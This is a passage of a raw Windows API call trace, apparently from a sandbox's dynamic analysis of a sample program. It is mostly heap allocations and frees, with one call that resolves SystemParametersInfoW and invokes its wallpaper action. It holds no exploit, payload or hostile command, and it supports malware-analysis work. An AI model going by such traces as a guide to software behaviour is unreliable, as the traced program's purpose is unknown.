(HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0291.131] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0291.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0291.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0291.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0291.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0291.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0291.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0291.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0291.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0291.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0291.131] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0291.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0291.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0291.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0291.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0291.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0291.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0291.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0291.132] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0291.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0291.132] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0291.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0291.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0291.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0291.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0291.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0291.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0291.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0291.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0291.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0291.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0291.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0291.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0291.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0291.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0291.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0291.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0291.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0291.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0291.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0291.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0291.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0291.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0291.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0291.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0291.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0291.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0291.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0291.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0291.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0291.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0291.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0291.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0291.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0291.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0291.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0291.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0291.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0291.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0291.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0291.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0291.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0291.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0291.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0291.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0291.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0291.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0291.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0291.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0291.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0291.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0291.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0291.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0291.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0291.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0291.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0291.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0291.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0291.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0291.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0291.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0291.141] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0291.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0291.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0291.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0291.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0291.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0291.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0291.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0291.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0291.145] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0291.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0291.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0291.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0291.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0291.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0291.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0291.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0291.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0291.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0291.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0291.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0291.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0291.146] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0291.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0291.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0291.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0291.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0291.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0291.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0291.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0291.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0291.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0291.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0291.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0291.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0291.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0291.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0291.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0291.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0291.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0291.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0291.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0291.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0291.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0291.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0291.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0291.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0291.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0291.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0291.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0291.280] FreeLibrary (hLibModule=0x74f40000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0291.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0291.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0291.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0291.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0291.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0291.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0291.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0291.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0291.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0291.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0291.282] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0291.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0291.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0291.282] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0291.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0291.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0291.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0291.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0291.282] RtlAllocateHeap 